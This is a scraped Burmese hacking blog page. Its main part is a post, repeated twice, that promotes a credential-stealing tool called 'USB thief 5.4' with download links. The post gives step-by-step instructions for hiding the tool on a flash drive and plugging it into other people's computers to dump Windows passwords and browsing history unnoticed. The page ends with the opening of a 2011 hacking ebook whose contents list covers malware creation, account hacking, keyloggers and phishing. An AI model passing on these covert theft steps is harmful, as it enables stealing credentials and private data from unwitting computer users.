အဲဒီမွာ ဒါေလးကို ရိုက္ထည့္ၾကည့္လိုက္.
nslookup www.google.com လို႕ရိုက္ျပီး enter ေခါက္ၾကည့္လိုက္ပါက
google ရဲ႕ IP ေတြက်လာပါလိမ့္မယ္။။မိမိသိခ်င္တဲ႕ website ရဲ႕ အမည္ကို ေျပာင္းရိုက္ၾကည့္ေပါ့
ေပ်ာ္ရႊင္ႏိုင္ပါေစ
(မစၥတာ.ေမာင္ဘစ္ေန)

Wednesday, January 23, 2013

Hacking စိတ္၀င္စားသူေတြအတြက္ လက္ေဆာင္ တစ္ခုေပးခ်င္တယ္။

USB thief 5.4
10 Comments »
သိၿပီးသားလူေတြလည္းပါပါလိမ္႔မယ္။ အားစိုက္ထုတ္စရာ မလိုပဲ သူမ်ားရဲ႕ security ေတြလိုခ်င္သူေတြအတြက္ ေတာ္ေတာ္ကို မိုက္ပါတယ္။ USB thief တဲ႔ USB(flash drive) ကို ကြန္ပ်ဴတာမွာ ထိုးလိုက္ရံုနဲ႔ သူ႔ရဲ႕ လက္ရိွသံုးေနတဲ႔ windows user password, Internet History ေတြ Video ၾကည္႔ထားတဲ႔ မွတ္တမ္းေတြ၊ အမ်ားႀကီးဗ်ာ ကြန္ပ်ဴတာ အသံုးျပဳမႈ မွတ္တမ္းေတြအားလံုး USB drive ထဲ ပါလာပါလိမ္႔မယ္။ စိတ္၀င္စားစရာ ေကာင္းမွာပါေနာ္။ အေသးစိတ္ေျပာျပပါ႔မယ္ ေအာက္က ဖိုင္ေလးကို ေဒါင္းလိုက္ပါ။ Windows XP , Vista ႏွစ္ခုစလံုးမွာ အလုပ္လုပ္ပါတယ္။ Mirror 1 Fileden : Download USB thief 5.4
Mirror 1 Zshare : Download USB thief 5.4 rar ဖိုင္နဲ႔႔ပါ ။ ဇစ္ျဖည္လိုက္ရင္ USB thief ဆိုတဲ႔ ဖိုဒါထဲမွာ Folder သံုးခုနဲ႔ file ႏွစ္ခု ရိွပါတယ္။ အဲဒီ ၅ ခုလံုးကို မိမိရဲ႕ Flash drive ထဲ ကူးထည္႔လုိက္ပါ။ ဘာဖိုဒါထဲမွ ထပ္မထည္႔ပါနဲ႔။ (ဥပမာ - မိမိကြန္ပ်ဴတာမွာ flash drive တပ္လုိက္ရင္ Drive J:\ အျဖစ္ျပတယ္ ဆိုပါစို႔။ Drive J:\ ကို ဖြင္႔လိုက္တာနဲ႔ ဖိုင္ ၅ ခုလံုး ျမင္ရပါမယ္။ ကေလးပါ နားလည္ေအာင္ ေျပာလိုက္တာပါ) ၿပီးရင္ ဖိုင္ ၅ ခုလံုးကို Hidden ေပးထားႏိုင္ပါတယ္။ (မေပးထားလည္းရပါတယ္) ကူးၿပီးရင္ USB drive ကို ျဖဳတ္ ။ ကြန္ပ်ဴတာ တစ္လံုးမွာ သြားထိုးၾကည္႔ပါ။ (မိမိကြန္ပ်ဴတာမွာပဲ ျဖစ္ျဖစ္ေပါ႔) ေအာက္ပါအတိုင္း ေပၚလာပါတယ္။ (Autorun မပိတ္ထားဘူး ဆိုရင္ေပါ႔) က်ေနာ္ အခုျပထားတဲ႔ ပံုစံအတိုင္း Ok ေပးလိုက္ရံုနဲ႔ မိမိရဲ႕ Windows user password က စလို႔ ကြန္ပ်ဴတာသံုးေနတဲ႔ History ေတာ္ေတာ္မ်ားမ်ား ပါသြားပါၿပီ။ ဘာေတြပါသြားလဲ သိခ်င္ရင္ Dump ဆိုတဲ႔ ဖိုဒါကို ဖြင္႔ၾကည္႔လိုက္ပါ။ ဒီလို USB ထိုးခဲ႔သမွ် ကြန္ပ်ဴတာေတြရဲ႕ Computer name နဲ႔ ဖိုဒါ ျမင္ရပါမယ္။ (ကြန္ပ်ဴတာတစ္လံုးကို ဖိုဒါတစ္ခု နဲ႔ ျမင္ရပါလိမ္႔မယ္။က်ေနာ္ ကြန္ပ်ဴတာ သံုးလံုးမွာ ထိုးခဲ႔တာပါ)
တစ္ခုကို ဖြင္႔ၾကည္႔လိုက္ပါ။ ေအာက္ပါအတိုင္း ျမင္ရပါတယ္။ ( ၁၉ ခု ျပေပးႏိုင္ပါတယ္ )
Networkpasswords ဆိုတာကို ႏွိပ္လိုက္ရင္ windows user passwords ကို ျမင္ရပါတယ္။ က်န္တာေတြကေတာ႔ ကိုယ္႔ဘာသာ ဆက္ေလ႔လာလိုက္ေနာ္။ ဖိုင္ ၅ ခုလံုးကို Hidden ေပးထားလိုက္ရင္။ ဒါေတြ ရိွေနတာ ဘယ္သူမွ မသိေတာ႔ပါဘူး။ ေတာ္ေတာ္မ်ားမ်ားက Hidden files ေတြကို Show မေပးထားၾကဘူးေလ။ အဲေလာက္ဆို ကလိ ခ်င္တဲ႔ လူေတြ သိေလာက္ပါၿပီေနာ္။ ဘယ္သူမွ စိတ္အေႏွာင္႔ အယွက္ျဖစ္ေအာင္ က်ေနာ္႔ပို႔စ္က ဒုကၡ မျဖစ္ေစဘူးလို႔ ယံုၾကည္ပါတယ္ဗ်ာ။ Hacking ၀ါသနာပါတဲ႔ Beginner ေတြ အတြက္ပါ။ ေပ်ာ္ရႊင္ပါေစဗ်ာ ......

USB thief 5.4
10 Comments »
Hacking စိတ္၀င္စားသူေတြအတြက္ လက္ေဆာင္ တစ္ခုေပးခ်င္တယ္။ သိၿပီးသားလူေတြလည္းပါပါလိမ္႔မယ္။ အားစိုက္ထုတ္စရာ မလိုပဲ သူမ်ားရဲ႕ security ေတြလိုခ်င္သူေတြအတြက္ ေတာ္ေတာ္ကို မိုက္ပါတယ္။ USB thief တဲ႔ USB(flash drive) ကို ကြန္ပ်ဴတာမွာ ထိုးလိုက္ရံုနဲ႔ သူ႔ရဲ႕ လက္ရိွသံုးေနတဲ႔ windows user password, Internet History ေတြ Video ၾကည္႔ထားတဲ႔ မွတ္တမ္းေတြ၊ အမ်ားႀကီးဗ်ာ ကြန္ပ်ဴတာ အသံုးျပဳမႈ မွတ္တမ္းေတြအားလံုး USB drive ထဲ ပါလာပါလိမ္႔မယ္။ စိတ္၀င္စားစရာ ေကာင္းမွာပါေနာ္။ အေသးစိတ္ေျပာျပပါ႔မယ္ ေအာက္က ဖိုင္ေလးကို ေဒါင္းလိုက္ပါ။ Windows XP , Vista ႏွစ္ခုစလံုးမွာ အလုပ္လုပ္ပါတယ္။ Mirror 1 Fileden : Download USB thief 5.4
Mirror 1 Zshare : Download USB thief 5.4 rar ဖိုင္နဲ႔႔ပါ ။ ဇစ္ျဖည္လိုက္ရင္ USB thief ဆိုတဲ႔ ဖိုဒါထဲမွာ Folder သံုးခုနဲ႔ file ႏွစ္ခု ရိွပါတယ္။ အဲဒီ ၅ ခုလံုးကို မိမိရဲ႕ Flash drive ထဲ ကူးထည္႔လုိက္ပါ။ ဘာဖိုဒါထဲမွ ထပ္မထည္႔ပါနဲ႔။ (ဥပမာ - မိမိကြန္ပ်ဴတာမွာ flash drive တပ္လုိက္ရင္ Drive J:\ အျဖစ္ျပတယ္ ဆိုပါစို႔။ Drive J:\ ကို ဖြင္႔လိုက္တာနဲ႔ ဖိုင္ ၅ ခုလံုး ျမင္ရပါမယ္။ ကေလးပါ နားလည္ေအာင္ ေျပာလိုက္တာပါ) ၿပီးရင္ ဖိုင္ ၅ ခုလံုးကို Hidden ေပးထားႏိုင္ပါတယ္။ (မေပးထားလည္းရပါတယ္) ကူးၿပီးရင္ USB drive ကို ျဖဳတ္ ။ ကြန္ပ်ဴတာ တစ္လံုးမွာ သြားထိုးၾကည္႔ပါ။ (မိမိကြန္ပ်ဴတာမွာပဲ ျဖစ္ျဖစ္ေပါ႔) ေအာက္ပါအတိုင္း ေပၚလာပါတယ္။ (Autorun မပိတ္ထားဘူး ဆိုရင္ေပါ႔) က်ေနာ္ အခုျပထားတဲ႔ ပံုစံအတိုင္း Ok ေပးလိုက္ရံုနဲ႔ မိမိရဲ႕ Windows user password က စလို႔ ကြန္ပ်ဴတာသံုးေနတဲ႔ History ေတာ္ေတာ္မ်ားမ်ား ပါသြားပါၿပီ။ ဘာေတြပါသြားလဲ သိခ်င္ရင္ Dump ဆိုတဲ႔ ဖိုဒါကို ဖြင္႔ၾကည္႔လိုက္ပါ။ ဒီလို USB ထိုးခဲ႔သမွ် ကြန္ပ်ဴတာေတြရဲ႕ Computer name နဲ႔ ဖိုဒါ ျမင္ရပါမယ္။ (ကြန္ပ်ဴတာတစ္လံုးကို ဖိုဒါတစ္ခု နဲ႔ ျမင္ရပါလိမ္႔မယ္။က်ေနာ္ ကြန္ပ်ဴတာ သံုးလံုးမွာ ထိုးခဲ႔တာပါ)
တစ္ခုကို ဖြင္႔ၾကည္႔လိုက္ပါ။ ေအာက္ပါအတိုင္း ျမင္ရပါတယ္။ ( ၁၉ ခု ျပေပးႏိုင္ပါတယ္ )
Networkpasswords ဆိုတာကို ႏွိပ္လိုက္ရင္ windows user passwords ကို ျမင္ရပါတယ္။ က်န္တာေတြကေတာ႔ ကိုယ္႔ဘာသာ ဆက္ေလ႔လာလိုက္ေနာ္။ ဖိုင္ ၅ ခုလံုးကို Hidden ေပးထားလိုက္ရင္။ ဒါေတြ ရိွေနတာ ဘယ္သူမွ မသိေတာ႔ပါဘူး။ ေတာ္ေတာ္မ်ားမ်ားက Hidden files ေတြကို Show မေပးထားၾကဘူးေလ။ အဲေလာက္ဆို ကလိ ခ်င္တဲ႔ လူေတြ သိေလာက္ပါၿပီေနာ္။ ဘယ္သူမွ စိတ္အေႏွာင္႔ အယွက္ျဖစ္ေအာင္ က်ေနာ္႔ပို႔စ္က ဒုကၡ မျဖစ္ေစဘူးလို႔ ယံုၾကည္ပါတယ္ဗ်ာ။ Hacking ၀ါသနာပါတဲ႔ Beginner ေတြ အတြက္ပါ။ ေပ်ာ္ရႊင္ပါေစဗ်ာ ......

ြျမန္မာဟက္ကာ လက္စြဲ



WWW.MYANMARHACKING.COM
2011
Myanmar Basic Hacking
ebook
Basic Hacking
Kglay (blind.heart7@gmail.com)
W W W . M Y A N M A R H A C K I N G . C O M
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 2
Contents
1…Introduction----------------------------------------------------------------- 6
What is a hacker?
How many types of hackers are there in the world?
What do black hackers do?
What do white hackers do?
How many rows are there in Hackers world?
What does it take to become a hacker?
2…Programming---------------------------------------------------------------- 11
Do I need it?
Where should I start?
3…Linux--------------------------------------------------------------------------- 14
What is Linux?
4…Malware---------------------------------------------------------------------- 16
What is Malware?
Definitons…
Creating a malicious program with ProRat
How to prevent from Malware
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 3
5…Hacking window password--------------------------------------------- 24
Cracking window password
How to prevent window password from changing
Changing window password while using computer
6…Password-------------------------------------------------------------------- 27
Hacking gmail password with software
Hacking facebook account with software
7…Key-logging------------------------------------------------------------------ 30
About keyloggers(KGB)
KGB Keylogger
Installing KGB Keylogger
Using KGB keylogger
Preventing from keylogger
8…Phishing----------------------------------------------------------------------- 39
How to make a basic phshing page
Preventing Phishing
9… BYE ### BYE ---------------------------------------------------------------- 42
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 4
စာေရးသူရဲ့စကား…
ကၽြန္ေတာ္ဟာ နည္းပညာေလာကထဲကို၀င္ေရာက္လာထဲက ေရကုန္ေရခန္းေလ့လာဖို႔…..
ဆံုးျဖတ္ျပီးသားပါ။လက္ရွိအခ်ိန္ထိလဲေလ့လာေနဆဲပါ။ေနာက္တစ္ခုက ကၽြန္ေတာ္သိသေလာက္ကို…
တျခားေလ့လာေနတဲ့လူေတြလဲ သိနိုင္ေအာင္ ဒီလို စာအုပ္ေလးေတြေရးျပီးေတာ့ online ေပၚမွာ ျဖန္႕ဖို႔
စိတ္ကူးရွိခဲ့ပါတယ္။ဒီစာအုပ္ကေတာ့…ကၽြန္ေတာ္ေရးတဲ့ ပထမဆံုးစာအုပ္ျဖစ္ပါတယ္။
ဘာလို႔လဲဆိုေတာ့ ကၽြန္ေတာ္က အခုမွ 10တန္းေအာင္ကာစ 16ႏွစ္အရြယ္ ခ်ာတိတ္တစ္ေယာက္ပဲ
ရွိပါေသးတယ္။ေနာက္ပိုင္းမွာ ဒီ့ထက္ပိုမိုေကာင္းမြန္တဲ့ စာအုပ္ေတြကိုေရးသားျပီးေတာ့…သင္တို႔ဆီကို
ပို႔ေဆာင္ ေပးပါမယ္။
ကၽြန္ေတာ္ဒီစာအုပ္ကိုေရးတဲ့အခါမွာ…ကိုးကားျပီးေရးခဲ့တဲ့စာအုပ္ကေတာ့…
Hacker ေတြရဲ့ လက္စြဲ Hacker’s Underground Handbook ျဖစ္ပါတယ္။ဘာလို႔ ကိုးကားတာလဲဆိုေတာ့
ကၽြန္ေတာ့အေနနဲ႔အခုမွေရးတာျဖစ္တဲ့အတြက္…အတုယူစရာေလးေတြကိုရယူျပီးေတာ့ေရးပါတယ္။
ဒါေၾကာင့္ပါ။ျပီးေတာ့ Handbook ထဲကအေၾကာင္းအရာေတြလဲ တစ္စိတ္တပိုင္းပါ၀င္ပါတယ္။
ဒါကေတာ့ ၀န္ခံခ်က္ပါ။
ထပ္ေျပာခ်င္တာကေတာ့…hacker ေတြအေနနဲ႔ ေလ့လာမႈကိုဒီတိုင္းရပ္ထားလို႔မရပါဘူး။
အခ်ိန္တိုင္းမွာ ကိုယ္ဘာေကာင္လဲဆိုတာ သူမ်ားသိေအာင္လုပ္ရပါမယ္။အဲလိုေျပာလို႔….
လူၾကားသူၾကားထဲမွာ `ေဟ့ေကာင္ေတြ ငါက Hacker ကြ မင္းတုိ႔ေကာင္ေတြ ေလာက္ေတာ့သနားတယ္´
လို႔ေအာ္ရင္ေတာ့ သိပ္မၾကာခင္မွာ သင္ဟာ go to the jail ျဖစ္သြားနိုင္ပါတယ္။ျမန္မာျပည္မွာေတာ့…
ဒီဥပေဒကသိပ္ေခတ္မစားေသးပါဘူး။ေနာက္ပိုင္းေတာ့ ပိုျမင့္လာမွာေသခ်ာပါတယ္။
အဓိက အခ်က္ကေတာ့ Hacker ဆိုတာ သိုသိုသိပ္သိပ္ေနတတ္ရမယ္ကိုယ့္ကိုေဆာ္ကားလာတဲ့လူေတြရွိရင္…
အေကာင္းဆံုးနည္းလမ္းေတြနဲ႔ ျပန္ျပီးေတာ့ Fight နိုင္ရပါမယ္။ဒါကေတာ့ ကၽြန္ေတာ့ရဲ့အျမင္ပါ။
ကၽြန္ေတာ့အေနနဲ႔ကေတာ့…ျမန္မာျပည္ကလူေတြကို gtalk နဲ႔ Q ရင္းအခ်ိန္မကုန္ေစခ်င္ပါဘူး။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 5
ဒီလိုေျပာလို႔ ကၽြန္ေတာ္ကဆရာၾကီးလားဆိုေတာ့ မဟုတ္ပါဘူး။ကၽြန္ေတာ္ကဘာမွမသိတဲ့ kglay ပါ
ကၽြန္ေတာ္တို႔ျမန္မာနိုင္ငံရဲ့ နည္းပညာက႑ၾကီးတိုးတက္လာေစခ်င္တာပါ။ဒီစာအုပ္က hacking အေျခခံ
ဆိုေတာ့ တျခားအေၾကာင္းေတြ သိပ္ေျပာလို႔မေကာင္းပါဘူး။
Hacker တစ္ေယာက္ရဲ့လိုအပ္ခ်က္ေတြကို ကၽြန္ေတာ့အျမင္နဲ႔ေျပာရရင္…
1…အခ်ိန္ေတာ္ေတာ္မ်ားမ်ားကို ေလ့လာျခင္းအတြက္သံုးေနရမယ္။(အဓိက)
2…problem တစ္ခုျဖစ္လာျပီဆိုရင္ ဘယ္လိုေျဖရွင္းရမယ္ဆိုတာကို ေသခ်ာစဥ္းစားမယ္။
3…မိမိကုိယ္တိုင္က software ေတြကို မဖန္တီးနိုင္ဘူးဆိုရင္ေတာင္…hacker ေတြဖန္တီးထားတဲ့
Software ေတြ tools ေတြ အေၾကာင္းကို ေသေသခ်ာခ်ာသိရပါမယ္။ဒါမွလဲ ဘာျဖစ္ရင္
ဘယ္ tool ကိုသံုးမယ္ဆိုတာသိနိုင္ပါမယ္။
4… အျမဲတမ္းသိုသိုသိပ္သိပ္ေနရမယ္။ အလကားေနရင္း ငါကြ Hacker လို႔ေအာ္ေနစရာမလိုဘူး။
Hacker ေတြအခ်င္းခ်င္းက ဒီေကာင္ဘယ္အဆင့္ရွိတယ္ဆိုတာကို နညး္လမး္နဲ႔စမ္းျပီးေတာ့သိနိုင္တယ္
5…Programming ပိုင္းကိုကၽြမ္းကၽြမ္းက်င္က်င္ အသံုးခ်နိုင္ရမယ္။
6…ဒီအခ်က္ကေတာ့ Hacker တိုင္းထားသင့္တဲ့စိတ္ထားေပါ့။
သူမ်ားကို ဒုကၡမေပးပါနဲ႔။ကၽြန္ေတာ္ဆိုရင္လဲ တကယ္ပါသူမ်ားကိုဒုကၡမေပးပါဘူး။
သူမ်ားကိုေတာ့ ဒုကၡသြားမေပးၾကပါနဲ႔…….
ကဲ ၾသ၀ါဒေတြ ေခၽြတာမ်ားသြားျပီ………………..ဖတ္လိုက္ၾကပါ အစ္ကိုတို႔ေရ…
Kglay(blind.heart7@gmail.com)
www.myanmarhacking.com
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 6
Chapter 1
Introduction
ဒီစာအုပ္ကို ဖတ္ျခင္းျဖင့္ သင့္အေနနဲ႔ Hacker တစ္ေယာက္ျဖစ္ဖို႔အတြက္ လမ္းစေလးေပၚလာ
နိုင္ပါတယ္။ဒီစာအုပ္မွာက Ethical hacker(လူ စိတ္ဓာတ္ရွိတဲ့ hacker ) တစ္ေယာက္ျဖစ္ဖို႔အတြက္ေလးပဲ
ေျပာျပနိုင္မွာပါ။
What is a hacker?
Hacker ဆိုတာဘာလဲ။Hacker ဆိုတာ ဘယ္လိုလူမ်ိဳးကိုေျပာတာလဲဆိုတာကေန စေျပာပါမယ္။
Hacker ဆိုတာက လူတစ္ေယာက္ပါပဲ။ဘယ္လိုလူလဲ ?။ သူက computer system ကိုကလိရတာၾကိဳက္တဲ့သူ
ျပီးေတာ့ computer ရဲ့ system ပိုင္းကို သာမန္ user တစ္ေယာက္ထက္ ပိုျပီးေတာ့ သိခ်င္တဲ့သူ။
Hacker ေတြဟာ computer system ပိုင္းေတြ ဘယ္လိုအလုပ္လုပ္သလဲဆိုတာကို အျမဲတမး္ရွာေဖြပါတယ္။
သူတို႔က ဘာလို႔ရွာတာလဲ? Computer system တစ္ခုခုကိုျပင္လိုက္ရင္ ဘာျဖစ္သြားမလဲ။ဒါေလးျပင္လိုက္ရင္
ဘာျဖစ္သြားမလဲ။ပိုျပီးေတာ့ ေကာင္းသြားမလား။ပိုျပီးေတာ့ဆိုးသြားမလား။အဲလိုမ်ိဳးေတြကို သိခ်င္တဲ့ သူေတြပါ။
Hacker တစ္ေယာက္ဟာ ညစ္ညမ္းတဲ့စိတ္ဓာတ္နဲ႔ hacking အလုပ္တစ္ခုကိုလုပ္ေတာ့မယ္ဆိုရင္…
သူလုပ္ရမွာက..2ခုပဲရွိပါတယ္။
1……..computer system ပိုင္းကို hack မွာလား
2……..webserver ကိုhack ျပီးေတာ့ သတင္းအခ်က္အလက္ေတြကိုယူမွာလား…
ဒါကေတာ့ တကယ့္ Hacker ၾကီးေတြလုပ္တာကိုေျပာတာပါ။ဟိုစပ္စပ္…ဒီစပ္စပ္ gmail account ေလး hack
Facebook account ေလး hack တဲ့ ႏွပ္ခ်ီးတူးေတြကိုေျပာတာမဟုတ္ပါဘူး။
အဲလို gmail account ေတြ facebook account ေတြ hack တယ္ဆိုတာ အရမ္းလြယ္ပါတယ္။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 7
Hack လို႔ရတဲ့ software ေတြဆိုတာ internet မွာ ပလူပ်ံေနတာပါပဲ။အဲဒီ့အေၾကာင္းကို ေနာက္မွေျပာတာေပါ့။
How many types of hackers are there in the world?
Hacker အမ်ိဳးအစား ဘယ္ႏွမ်ိဳးရွိသလဲ။ဒါကေတာ့ လူေတာ္ေတာ္မ်ားမ်ားသိမွာပါ။
Hacker ကို ေသေသခ်ာခ်ာခဲြၾကည့္ရင္ 2မ်ိဳးပဲရွိပါတယ္။
Black hat နဲ႔ white hat ပါ။တခ်ိဳ႕ေတြကေျပာတာကေတာ့ grey hat တဲ့။ဟီး…ဟုတ္ရင္လဲဟုတ္မွာေပါ့။
ဒါေပမယ့္ေသခ်ာခြဲရင္ 2မ်ိဳးပါ။
Black hat--- သူက ညစ္ညမ္းတဲ့စိတ္ထားရွိျပီးေတာ့…အမ်ားတကာကို ဒုကၡလိုက္ေပးတဲ့ hackerမ်ိဳးျဖစ္ပါတယ္
Black hat လိုမ်ိဳး hacker တစ္ေယာက္ျဖစ္ခ်င္တယ္ဆိုရင္ေတာ့…သင့္ရဲ့ ဘ၀ကို ေလ့လာျခင္း
ဆိုတဲ့ အပိုင္းထဲမွာပဲ ႏွစ္ျမဳပ္ထားရပါမယ္။programming အပိုင္းေတြကိုလဲ က်ယ္က်ယ္ျပန္႔ျပန့္
သိဖို႔လိုပါတယ္။
White hat---သူကေတာ့ အျဖဴေရာင္စိတ္ထားရွိတဲ့ hacker မ်ိဳးေပါ့။ဒီလို hacker ေတြက တစ္ခ်ိန္က်ရင္…
Computer ရဲ့ security , website ေတြရဲ့ security ပိုင္းေတြမွာ…profeesional ေကာင္း
တစ္ေယာက္ျဖစ္သြားတတ္ပါတယ္။ သူက လဲ black hacker နဲ႔ ထူးမျခားနားပါပဲ။
အခ်ိန္တိုင္းလိုလိုကို ေလ့လာေနဖို႔လိုအပ္ပါတယ္။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 8
What do Black Hackers do?
Black hacker ေတြ ဘာလုပ္သလဲ။သိခ်င္လား။သူတို႔အနားမွာသြားေနေလ။အကုန္သိရတယ္။ဟဲဟဲ
Black hacker ေတြက အစိုးရေတြရဲ့ website ေတြကိုဖ်က္တယ္။ဘဏ္ေတြရဲ့ network security ပိုင္းေတြကို
၀င္ေမႊတယ္။ျပီးရင္…(တျခားနိုင္ငံမွာေတာ့) credits card ေတြကို hack တယ္။ပိုက္ဆံယူတယ္။
သူတို႔ကို ေၾကးစားသေဘာနဲ႔ငွားျပီးေတာ့ လဲသံုးလို႔ရတယ္။
What do White hackers do?
White hackers ေတြကေတာ့ ရိုးသားတဲ့သူေတြေပါ့။သူတို႔က သူမ်ားေတြကို အကူအညီေပးမယ္။
ကၽြန္ေတာ္အေပၚက ေျပာခဲ့သလို professional security တစ္ေယာက္ျဖစ္လာတဲ့အတြက္…company ေတြ
အတြက္ အလုပ္လုပ္ေပးမယ္။ျပီးရင္ သူတို႔တတ္ထားတာေတြကို ျပန္လည္ေ၀မွ်မယ္(တခ်ိဳ႕ေသာသူမ်ားကိုသာ
ဆုိလိုသည္)။
ကၽြန္ေတာ္ေျပာခဲ့တာေတြက တကယ့္ hacker ၾကီးေတြကိုေျပာတာပါ။Hacker ၾကီးဆိုလို႔ ဘာေကာင္ၾကီးလဲ
လို႔ထင္မေနပါနဲ႔။ရိုးရိုးလူပါပဲ။ေနာက္ထပ္ hacker အမ်ိဳးအစားရွိတယ္ဗ်။
ဒါေပမယ့္ လူတိုင္းေတာ့သိပ္မသိဘူး…အျမင္ကပ္ပုဒ္မနဲ႔လိုက္ hack တဲ့ေကာင္ :)။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 9
How many rows are there in Hackers world?
Hacker အဆင့္အတန္းဘယ္ ႏွမ်ိဳးရွိသလဲ။ ရွင္းရွင္းေျပာရရင္ Hacker အဆင့္အတန္း 3မ်ိဳးရွိပါတယ္။
Script kiddies---(Tools user hacker) လို႔ေခၚပါတယ္။သူက်ေတာ့ hacker ထဲမွာ အဆင့္အနိမ့္ဆံုးပါပဲ။
သူက တျခား hacker ေတြထြင္ထားတဲ့ tools ေတြ softwares ေတြကိုသံုးျပီးေတာ့ hacker
အမည္ခံၾကတာပါ။သူတို႔က နညး္ပညာဗဟုသုတ ဘာမွကိုမသိတဲ့သူေတြေပါ့။
Intermediate---သူၾကေတာ့ hacking ပိုင္းေတြနညး္ပညာပိုင္းေတြကို ထိုက္သင့္သေလာက္သိတယ္။
Hacker programming ပိုင္းေတြကိုလဲ အကၽြမ္းတ၀င္ရွိတယ္။ဘယ္toolကဘယ္လိုအလုပ္လုပ္တယ္
ဆိုတာကိုသိပါတယ္။ဒါကေတာ့ ဒုတိယအဆင့္ေပါ့။ဒါေပမယ့္သူတို႔လဲပဲ တျခား hacker ေတြ
ထြင္ထားတဲ့ tools ေတြကိုသံုးျပီး hack ရပါတယ္။
Elite hacker--- သူကေတာ့ အျမင့္ဆံုးေပါ့ဗ်ာ။ Hacking tools အသစ္ေတြမ်ားစြာကိုထြင္တယ္။
ဖန္တီးတယ္။Hacking ပိုင္းေတြကိုကၽြမ္းက်င္တယ္။ပိုင္နိုင္တယ္။
System တစ္ခုလံုးကို ေျခရာလက္ရာမရွိ အကုန္အေပ်ာက္ သဲလြန္စပါမက်န္။
၀င္နိုင္ထြက္နိုင္ပါတယ္။တကယ္လို႔ သင္ဟာ Hacking ပိုင္းကိုေသေသခ်ာခ်ာေလ့လာမယ္
ဆိုရင္ ေနာက္ဆံုးမွာ မ်က္မွန္တပ္ရပါမယ္။အဲေလ…ဒီအဆင့္ကိုေရာက္ပါလိမ့္မယ္။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 10
What does it take to become a hacker?
Hacker ျဖစ္ဖို႔ အခ်ိန္ဘယ္ေလာက္လိုမလဲ။
Hacker တစ္ေယာက္ျဖစ္ဖို႔ဆိုတာ မလြယ္ပါဘူး။ အလြယ္တကူနဲ႔လဲ ျမန္ျမန္မျဖစ္နိုင္ပါဘူး။
အပ္ခ်ေလာင္း ဥံဳဖြ ဆိုျပီးေတာ့လဲ hacker တစ္ေယာက္မျဖစ္နိုင္ပါဘူး။
မိမိေလ့လာနိုင္တဲ့ အခ်ိန္မ်ားလာေလေလ Hacker တစ္ေယာက္ျဖစ္ဖို႔အခြင့္အလမ္းေတြက နီးလာေလေလ
ပါပဲ။၁ႏွစ္လဲျဖစ္နိုင္သလို ၄၊၅ ၊၁၀ႏွစ္လဲျဖစ္သြားနိုင္ပါတယ္။
ေလ့လာတယ္ဆိုျပီးေတာ့ Gtalk နဲ႔တကမၻာလံုးကလူေတြကို Q ေနရင္ေတာ့…တသက္လံုးျဖစ္မွာမဟုတ္ပါဘူး
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 11
Chapter 2
Programming
Do I need it?
Hacker တစ္ေယာက္ျဖစ္ဖို႔ Programming language လိုအပ္ပါသလားလို႔…ေမးၾကည့္ပါ။
ဒီလိုေမးလာရင္ အေျဖက သင့္ရဲ့ရည္မွန္းခ်က္ေပၚမွာမူတည္ပါတယ္။
ဘယ္လိုလဲဆိုေတာ့…သင့္အေနနဲ႔ ဘယ္လို Hacker ျဖစ္ခ်င္တယ္ဆိုတာပါပဲ။
သင့္အေနနဲ႔ ရိုးသားတဲ့ Hacker တစ္ေယာက္ျဖစ္ဖို႔ Programming ပိုင္းကိုမသိပဲေနလို႔ရပါတယ္။
ေျပာရရင္ Ethical hacker တစ္ေယာက္ျဖစ္ဖို႔ေပါ့ဗ်ာ။
သင့္အေနနဲ႔…security tools ေတြအေၾကာင္းကို ေသေသခ်ာခ်ာသိတယ္ဆိုရင္ အခ်ိဳ႕ေသာ hacking မ်ားကို
လုပ္ေဆာင္နုိင္ပါတယ္။
သင့္အေၾကာင္းသိတဲ့သူအခ်ိဳ႕ကေတာ့ သင့္ကို script kiddies (Tool user hacker ) လို႔သတ္မွတ္ၾကပါမယ္။
တကယ္လို႔ tool user hacker အေနနဲ႔မေက်နပ္နိုင္ပဲ…Intermediate hacker တို႔ Elite hacker တို႔ျဖစ္ခ်င္
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 12
တယ္ဆိုရင္ေတာ့…Programming ပိုင္းကို အေျခခံကေနစျပီးေတာ့…ကၽြမ္းကၽြမ္းက်င္က်င္ထိတတ္ထား
သင့္ပါတယ္။Programming အေၾကာင္းကိုသိတဲ့အတြက္ software အသစ္ေတြကိုတီထြင္နိုင္ပါတယ္။
တကယ္ Hacker တစ္ေယာက္ျဖစ္ခ်င္တယ္ဆိုရင္ေတာ့ Programming ပိုင္းကိုေသေသခ်ာခ်ာသိထားဖို႔
လိုပါတယ္။
Where should I start?
တကယ္လို႔ သင့္အေနနဲ႔Hackerတစ္ေယာက္ျဖစ္ခ်င္လို႔Programmingပိုင္းကိုေသခ်ာေလ့လာခ်င္တယ္
ဒါေပမယ့္ ဘယ္ကစေလ့လာရမွန္းမသိရင္ အၾကံျပဳခ်င္ပါတယ္။HTML ဆိုတဲ့Hyper Text Markup Language
ကိုစတင္ေလ့လာရပါမယ္။ဘာလို႔လဲဆိုေတာ့ HTML ဆိုတာ Programming ပိုင္းမွာ အလြယ္ဆံုး Language
တစ္ခုျဖစ္ပါတယ္။ျပီးေတာ့ website ေတာ္ေတာ္မ်ားမ်ားကို html ကိုအဓိကပါ၀င္ျပီး ေရးဖြဲ႔ထားပါတယ္။
ျပီးေတာ့ HTML ဟာေလ့လာရလြယ္ကူတဲ့ Language တစ္ခုပါ။
ျပီးရင္ေတာ့…Microsoft ကထုတ္လုပ္လိုက္တဲ့ programming language တစ္ခုျဖစ္တဲ့ C# ကိုေလ့လာပါ။
